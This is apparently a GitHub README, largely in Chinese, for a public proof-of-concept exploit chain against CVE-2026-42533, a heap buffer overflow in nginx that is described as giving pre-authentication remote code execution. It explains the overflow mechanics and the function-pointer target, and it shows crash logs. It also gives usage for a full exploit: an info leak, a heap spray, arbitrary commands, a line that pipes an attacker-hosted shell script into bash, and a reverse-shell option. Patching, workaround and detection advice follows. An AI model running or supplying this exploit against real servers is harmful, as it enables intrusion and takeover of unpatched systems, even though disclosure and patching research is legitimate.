imbas007/CVE-2026-42533
GitHub: imbas007/CVE-2026-42533
CVE-2026-42533 的概念验证利用代码,演示了 nginx 两遍字符串求值引擎中的堆缓冲区溢出如何实现预认证 RCE。
Stars: 0 | Forks: 0
# CVE-2026-42533 — nginx 堆缓冲区溢出 PoC 漏洞利用
**通过两遍捕获覆盖实现预认证远程代码执行**
**公开 PoC 发布于 2026-07-27** — 不要等待,立即修补。
| | |
|---|---|
| **CVE** | CVE-2026-42533 |
| **CVSS 4.0** | 9.2 (严重) |
| **类型** | 堆缓冲区溢出 (CWE-122) |
| **受影响版本** | nginx 0.9.6 – 1.30.3 (稳定版), 0.9.6 – 1.31.2 (主线版) |
| **已修复版本** | nginx 1.30.4 / 1.31.3, NGINX Plus R36 P7 / 37.0.3.1 |
| **披露时间** | 2026-07-15 (F5 / NGINX) |
| **PoC 发布时间** | 2026-07-27 |
| **研究员** | Stan Shaw (0xCyberstan) |
## 已确认可行
| 平台 | 诊断 | 溢出 | 崩溃 | 信息泄露 |
|----------|-----------|----------|-------|-----------|
| **Ubuntu 24.04 x86_64** | ✅ | ✅ | ✅ SIGABRT | ⚠️ 部分可行 |
## 概述
CVE-2026-42533 是 nginx 两遍字符串求值引擎中存在的一个严重堆缓冲区溢出漏洞。当基于正则表达式的 `map` 指令与带编号的捕获组(`$1`、`$2` 等)交互时,共享的 `r->captures` 结构会在 LEN(测量)和 VALUE(写入)遍历之间被静默覆盖。这会导致大小不匹配:
- **较大的捕获 → 堆缓冲区溢出**(攻击者可控的越界写入)
- **较小的捕获 → 信息泄露**(暴露未初始化的堆内存,泄露 libc/堆指针)
将这两个利用原语组合使用,可以实现**可靠的预认证 RCE**,从而绕过 ASLR —— 在 Ubuntu 24.04 上演示了 10/10 的可靠性。
## 工作原理
```
┌─────────────────────────────────────────────────────────────┐
│ LEN PASS (measure) │
│ $1 from location ~ ^/api/(...)$ = "abc" → measures 3 bytes│
│ $overflow_gadget = giant_header → measures 5000 bytes │
│ Buffer allocated: 5003 bytes │
│ │
│ [ $overflow_gadget triggers map regex → clobbers $1 ] │
│ $1 now = giant_header (5000 bytes) │
│ │
│ VALUE PASS (write) │
│ $1 writes 5000 bytes (LEN said 3!) → OVERFLOW! │
│ $overflow_gadget writes 5000 bytes │
│ Total written: 10000 bytes into 5003-byte buffer │
│ → 4997 bytes overflow into adjacent heap │
└─────────────────────────────────────────────────────────────┘
```
溢出会破坏相邻的堆结构。主要目标是 `ngx_pool_cleanup_t`:
```
struct ngx_pool_cleanup_s {
ngx_pool_cleanup_pt handler; // function pointer → overwrite for RIP control
void *data; // argument to handler
ngx_pool_cleanup_t *next; // next in chain
};
```
当连接池被销毁时,会调用 `handler(data)` → 从而实现任意代码执行。
## 仓库结构
```
CVE-2026-42533/
├── exploit/
│ ├── exploit.py # Full exploit chain (leak → spray → overflow → RCE)
│ ├── leak.py # Info leak module (heap/libc pointer leak)
│ ├── overflow.py # Heap overflow module (crash / RCE trigger)
│ ├── analyze.py # GDB analysis helper for offset determination
│ └── requirements.txt # Python dependencies
├── nginx/
│ └── nginx.conf # Vulnerable nginx configuration
├── Dockerfile # Docker build for test environment (Ubuntu 24.04)
├── docker-compose.yml # Docker Compose for easy deployment
└── README.md
```
## 快速开始
### 前置条件
- Python 3.8+ 并带有 `requests` 库
- 目标:具有易受攻击配置的 nginx 0.9.6–1.30.3/1.31.2(见下文)
### 1. 验证漏洞(安全)
```
# 诊断模式 — 显示 two-pass mismatch(安全,不会崩溃)
python3 exploit/overflow.py --diagnose
```
输出:
```
header= 10: LEN= 13 actual= 13 internal_overflow= 7 ✓
header= 100: LEN= 103 actual= 103 internal_overflow= 97 ✓
header= 1000: LEN= 1003 actual= 1003 internal_overflow= 997 ✓
```
### 2. 崩溃 PoC(证明可利用性)
```
python3 exploit/overflow.py --crash
```
在 Ubuntu 24.04 上的结果:
```
worker process 12282 exited on signal 6 (core dumped)
free(): invalid next size (normal)
```
### 3. 设置测试环境
```
# Ubuntu 24.04(确认可用)
ssh root@
apt-get install -y build-essential libpcre2-dev libssl-dev zlib1g-dev
wget https://nginx.org/download/nginx-1.27.4.tar.gz
tar xzf nginx-1.27.4.tar.gz && cd nginx-1.27.4
./configure --prefix=/usr/local/nginx --with-cc-opt='-g -O0'
make -j$(nproc) && make install
# 复制易受攻击的配置
cp nginx/nginx.conf /usr/local/nginx/conf/nginx.conf
/usr/local/nginx/sbin/nginx
# 从您的机器运行 exploit
python3 exploit/overflow.py --diagnose
```
### 4. Docker(替代方案)
```
docker compose up -d --build
python3 exploit/overflow.py localhost --port 8080 --diagnose
```
## 用法
### 完整漏洞利用链
```
python3 exploit/exploit.py [options]
# 示例:
python3 exploit/exploit.py 192.168.1.100 # full auto
python3 exploit/exploit.py 192.168.1.100 --leak-only # recon only
python3 exploit/exploit.py 192.168.1.100 --crash # verify vuln
python3 exploit/exploit.py 192.168.1.100 --cmd "id > /tmp/pwned"
# 手动模式(如果您有预先泄露的地址)
python3 exploit/exploit.py 192.168.1.100 \
--libc 0x7f1234000000 \
--heap 0x5a1234000000 \
--cmd "curl http://attacker/shell.sh | bash"
# Reverse shell
python3 exploit/exploit.py 192.168.1.100 \
--reverse-shell --lhost 10.0.0.1 --lport 4444
```
### 信息泄露模块
```
python3 exploit/leak.py [options]
# 安静模式(仅输出地址)
python3 exploit/leak.py 192.168.1.100 -q
# LIBC:0x7f1234567890
# HEAP:0x5a1234567890
```
### 溢出模块
```
python3 exploit/overflow.py --crash # crash worker (PoC)
python3 exploit/overflow.py --spray # heap spray only
```
## 易受攻击的配置模式
该漏洞利用需要在 nginx 配置中包含此特定模式:
```
# 1. 基于 regex 的 map(会覆盖 capture state)
map $http_x_overflow $overflow_gadget {
"~^(.+)$" $1; # regex match overwrites $1
default "";
}
# 2. regex location(会创建 capture)
server {
location ~ ^/api/(...)$ { # creates $1, $2, ...
# 3. Both capture AND map variable in same directive
return 200 "$1$overflow_gadget"; # ← two-pass sink
}
}
```
使用公开的扫描程序**检测易受攻击的配置**:
- https://github.com/0xCyberstan/CVE-2026-42533-Config-Scanner
## 崩溃证明 (Ubuntu 24.04)
```
Worker PID: 12282
[Phase 1] Diagnostic:
header=100: LEN=103, response=103 ✓
header=1000: LEN=1003, response=1003 ✓ (997 byte internal overflow!)
[Phase 2] Heap Corruption:
8000-byte header → VALUE writes 16000 bytes into 8003-byte buffer
→ 7997 bytes overflow past buffer boundary
Worker PID: 12331 (NEW — old worker DEAD!)
Error log:
free(): invalid next size (normal)
worker process 12282 exited on signal 6 (core dumped)
```
## 缓解措施
### 立即处理(修补)
```
# 升级到已修复的版本:
# nginx 1.30.4+(stable)/ 1.31.3+(mainline)
# NGINX Plus R36 P7 / 37.0.3.1
```
### 临时变通方案
在 `map` 指令中,将带编号的捕获替换为**命名捕获**:
```
# 存在漏洞
map $http_foo $bar {
"~^(.+)$" $1; # numbered capture → clobbers shared state
}
# 已缓解
map $http_foo $bar {
"~^(?.+)$" $val; # named capture → isolated
}
```
### 检测
- 运行配置扫描程序:https://github.com/0xCyberstan/CVE-2026-42533-Config-Scanner
- 监控意外的 nginx worker 重启
- 检查 nginx 版本:`nginx -v`(应 ≥ 1.30.4 或 ≥ 1.31.3)
## 参考
- [F5 安全公告](https://my.f5.com/manage/s/article/K000143677)
- [0xCyberstan 技术分析](https://cyberstan.co.uk/nginx-rce/)
- [CVE-2026-42533 配置扫描程序](https://github.com/0xCyberstan/CVE-2026-42533-Config-Scanner)
## 免责声明
本 PoC 的发布仅用于**安全研究和防御目的**。请仅针对您拥有或获得明确授权进行测试的系统使用。该漏洞已被修补 — 如果您尚未升级,请立即升级。
标签:CISA项目, Nginx, PoC, 堆溢出, 安全, 暴力破解, 版权保护, 编程工具, 请求拦截, 超时处理, 远程代码执行, 逆向工具